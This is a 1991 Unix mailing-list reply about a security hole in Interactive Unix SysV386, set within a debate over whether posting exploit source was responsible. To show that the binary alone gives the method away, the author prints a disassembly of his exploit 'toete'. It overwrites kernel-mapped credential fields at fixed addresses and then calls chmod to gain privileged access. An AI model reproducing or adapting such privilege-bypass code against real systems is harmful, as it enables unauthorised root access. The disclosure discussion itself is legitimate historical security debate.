SECURITY BUG IN INTERACTIVE UNIX SYSV386
Joern Lubkoll
lumpi at dobag.in-berlin.de
Sat Feb 16 22:46:20 AEST 1991
cpcahil at virtech.uucp (Conor P. Cahill) writes:
> 2. I wholeheartly DISAGREE with you posting the source code which
> performs the security bypass. You could have just posted the
> uuencoded binary which would have been enough to prove your point
> without making it extremely easy for any two bit user to obtain
> privileged access. Yes a dedicated hacker could have decoded
> your explanation and/or the binary and figure out how to replicate
> your code, but the number of those is MUCH less than the number
> of people who can now violate the security of the system using
> your posted code.
> POSTING THE CODE WAS DEAD WRONG.
Everyone being able to use debugger or the disassembler, will be able
to get the information out of the binary !
lets look at the disassembly (done on isc 2.21):
--- BEGINS HERE ---
**** DISASSEMBLER ****
disassembly for toete
section .text
[startup code deleted]
11e: c7 45 fc 00 00 00 e0 movl $0xe0000000,0xfc(%ebp)
125: 8b 45 fc movl 0xfc(%ebp),%eax
128: 66 c7 80 ea 10 00 00 00 00 movw $0x0,0x10ea(%eax)
131: 8b 45 fc movl 0xfc(%ebp),%eax
134: 66 c7 80 ec 10 00 00 00 00 movw $0x0,0x10ec(%eax)
13d: 8b 45 fc movl 0xfc(%ebp),%eax
140: 66 c7 80 ee 10 00 00 00 00 movw $0x0,0x10ee(%eax)
149: 8b 45 fc movl 0xfc(%ebp),%eax
14c: 66 c7 80 f0 10 00 00 00 00 movw $0x0,0x10f0(%eax)
155: 68 b6 01 00 00 pushl $0x1b6
15a: 68 a0 03 40 00 pushl $0x4003a0
15f: e8 0c 00 00 00 call 0xc <170> /* CHMOD */
164: 83 c4 08 addl $0x8,%esp
167: c9 leave
168: c3 ret
[Library functions deleted]
Don't you think, this is enough for anyone to see, whats going on ?
jl
--
lumpi at dobag.in-berlin.de -- "Nothing is the complete absence of everything."
More information about the Comp.unix.sysv386
mailing list